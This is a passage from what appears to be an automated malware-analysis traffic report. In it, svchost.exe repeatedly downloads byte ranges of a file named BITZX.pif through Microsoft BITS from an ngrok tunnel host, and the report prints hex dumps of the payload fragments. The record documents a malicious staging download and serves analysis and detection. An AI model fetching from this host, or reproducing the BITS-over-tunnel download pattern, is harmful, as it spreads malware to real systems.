        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:07 UTC34INData Raw: 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a
        Data Ascii: *.(C(9***


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        112192.168.11.20498263.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:10 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=27465-27709
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:10 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 245
        Content-Range: bytes 27465-27709/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:10 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:10 UTC245INData Raw: 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 7b 15 00 00 af 04 00 00 2a 1a 00 00 94 00 00 00 00 00 00 00 02 00 00 00 7c 0a 00 00 31 11 00 00 ad 1b 00 00 9a 00 00 00 00 00 00 00 02 00 00 00 8f 07 00 00 b8 14 00 00 47 1c 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 73 00 00 00 94 1c 00 00 07 1d 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 14 0c 00 00 30 05 00 00 44 11 00 00 90 00 00 00 00 00 00 00 02 00 00 00 46 08 00 00 7f 11 00 00 c5 19 00 00 85 00 00 00 00 00 00 00 02 00 00 00 a7 05 00 00 a3 14 00 00 4a 1a
        Data Ascii: 0*Ad{*|1Gs-0*.(C(9***0*Ad0DFJ


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        113192.168.11.20498273.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:13 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=27710-27798
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:13 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 89
        Content-Range: bytes 27710-27798/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:13 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:13 UTC89INData Raw: 00 00 98 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 ae 1a 00 00 e2 1a 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00
        Data Ascii: 4~-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        114192.168.11.20498283.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:17 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=27799-28198
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:17 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 400
        Content-Range: bytes 27799-28198/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:16 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:17 UTC400INData Raw: 00 00 00 00 2a 41 64 00 00 02 00 00 00 61 10 00 00 c4 04 00 00 25 15 00 00 90 00 00 00 00 00 00 00 02 00 00 00 81 06 00 00 e8 10 00 00 69 17 00 00 98 00 00 00 00 00 00 00 02 00 00 00 2f 03 00 00 d2 14 00 00 01 18 00 00 b1 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 7e 18 00 00 b2 18 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 ad 0c 00 00 0c 05 00 00 b9 11 00 00 81 00 00 00 00 00 00 00 02 00 00 00 64 06 00 00 ab 11 00 00 0f 18 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 23 03 00 00 99 15 00 00 bc 18 00 00 ab 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 33 19 00 00 67 19
        Data Ascii: *Ada%i/4~~-0*.(C(9***0*Add#43g


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        115192.168.11.20498293.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:21 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=28199-28688
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:21 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 490
        Content-Range: bytes 28199-28688/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:20 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:21 UTC490INData Raw: 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30
        Data Ascii: 0*.(C(9***0**.(C(9***0**.(C(9***0**.(C(9***0**.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        116192.168.11.20498303.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:23 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=28689-28921
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:23 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 233
        Content-Range: bytes 28689-28921/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:23 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:23 UTC233INData Raw: 0e 00 00 0e 15 00 00 0f 23 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 73 00 00 00 5e 23 00 00 d1 23 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 a1 0c 00 00 8b 0f 00 00 2c 1c 00 00 c4 00 00 00 00 00 00 00 02 00 00 00 2f 07 00 00 c1 15 00 00 f0 1c 00 00 ab 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 3b 1d 00 00 9b 1d 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00
        Data Ascii: #s^##~-0*.(C(9***0*AL,/`;~-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        117192.168.11.20498313.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:25 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=28922-29086
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:25 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 165
        Content-Range: bytes 28922-29086/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:24 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:25 UTC165INData Raw: 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 43 0b 00 00 8b 07 00 00 ce 12 00 00 c0 00 00 00 00 00 00 00 02 00 00 00 0a 08 00 00 84 0b 00 00 8e 13 00 00 85 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 b3 13 00 00 13 14 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 35 0f 00 00 5c 07 00 00 91 16 00 00 85 00 00
        Data Ascii: *ALC`~-0*.(C(9***0*AL5\


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        118192.168.11.20498323.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:28 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29087-29196
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:28 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 110
        Content-Range: bytes 29087-29196/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:27 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:28 UTC110INData Raw: 00 00 00 00 00 02 00 00 00 07 0c 00 00 0f 0b 00 00 16 17 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 a1 17 00 00 d6 17 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00
        Data Ascii: 5~-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        119192.168.11.20498333.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:31 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29197-29411
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:32 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 215
        Content-Range: bytes 29197-29411/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:31 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:32 UTC215INData Raw: 00 00 2a 41 4c 00 00 02 00 00 00 f5 09 00 00 86 07 00 00 7b 11 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 1d 07 00 00 0b 0b 00 00 28 12 00 00 85 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 4d 12 00 00 ad 12 00 00 82 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 fb 09 00 00 d7 0e 00 00 d2 18 00 00 9a 00 00 00 00 00 00 00 02 00 00 00 e0 06 00 00 8c 12 00 00 6c 19 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 61 00 00 00 a5 19 00 00 06 1a 00 00 7e 00 00 00 2d 00 00 01
        Data Ascii: *AL{(`M-0*.(C(9***0*ALla~-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        120192.168.11.20498343.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:35 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29412-29606
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:36 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 195
        Content-Range: bytes 29412-29606/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:35 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:36 UTC195INData Raw: 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 df 13 00 00 e4 05 00 00 c3 19 00 00 ba 00 00 00 00 00 00 00 02 00 00 00 0f 0c 00 00 54 12 00 00 63 1e 00 00 ab 00 00 00 00 00 00 00 02 00 00 00 0f 09 00 00 ff 15 00 00 0e 1f 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 61 1f 00 00 a8 1f 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00
        Data Ascii: 0*.(C(9***0*AdTcGa~-0*.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        121192.168.11.20498353.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:39 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29607-29715
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:40 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 109
        Content-Range: bytes 29607-29715/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:40 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:40 UTC109INData Raw: 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 12 1b 00 00 22 05 00 00 34 20 00 00 92 00 00 00 00 00 00 00 02 00 00 00 c5 11 00 00 62 11 00 00 27 23 00 00 d5 00 00 00 00 00 00 00 02 00 00 00 bd 0e 00 00 3f 15 00 00 fc 23 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 73 00 00 00
        Data Ascii: *0*Ad"4 b'#?#s


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        122192.168.11.20498363.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:42 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29716-29731
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:43 UTC313INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 16
        Content-Range: bytes 29716-29731/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:42 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:43 UTC16INData Raw: 25 24 00 00 98 24 00 00 7e 00 00 00 2d 00 00 01
        Data Ascii: %$$~-


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        123192.168.11.20498373.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:45 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29732-29734
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:46 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 3
        Content-Range: bytes 29732-29734/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:46 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:46 UTC3INData Raw: 13 30 03
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        124192.168.11.20498383.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:49 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29735-29904
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:50 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 170
        Content-Range: bytes 29735-29904/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:50 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:50 UTC170INData Raw: 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 cc 0b 00 00 86 05 00 00 52 11 00 00 e2 00 00 00 00 00 00 00 02 00 00 00 0b 0a 00 00 3e 12 00 00 49 1c 00 00 98 00 00 00 00 00 00 00 02 00 00 00 f8 06 00 00 e9 15 00 00 e1 1c 00 00 ad 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 32 1d 00 00 8e 1d 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00
        Data Ascii: *.(C(9***0*AdR>I\2-0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        125192.168.11.20498393.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:52 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=29905-30142
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:53 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 238
        Content-Range: bytes 29905-30142/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:53 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:53 UTC238INData Raw: 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 68 09 00 00 28 05 00 00 90 0e 00 00 92 00 00 00 00 00 00 00 02 00 00 00 f1 05 00 00 6f 11 00 00 60 17 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 2a 03 00 00 e3 14 00 00 0d 18 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 c3 18 00 00 f7 18 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00
        Data Ascii: *.(C(9***0*Adh(o`*4~-0*.(C(9***0**.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        126192.168.11.20498403.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:54 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=30143-30344
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:55 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 202
        Content-Range: bytes 30143-30344/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:55 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:55 UTC202INData Raw: 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a
        Data Ascii: *0**.(C(9***0**.(C(9***0**.(C(9***0**.(C(9**


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        127192.168.11.20498413.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:45:57 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=30345-30857
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:45:58 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 513
        Content-Range: bytes 30345-30857/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:45:57 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:45:58 UTC513INData Raw: 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 2e 28 43 f5 00 06 28 39 f5 00 06 2a
        Data Ascii: *0**.(C(9***0**.(C(9***0**.(C(9***0**.(C(9***0**.(C(9*


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        128192.168.11.20498423.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:01 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=30858-31158
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:01 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 301
        Content-Range: bytes 30858-31158/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:01 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
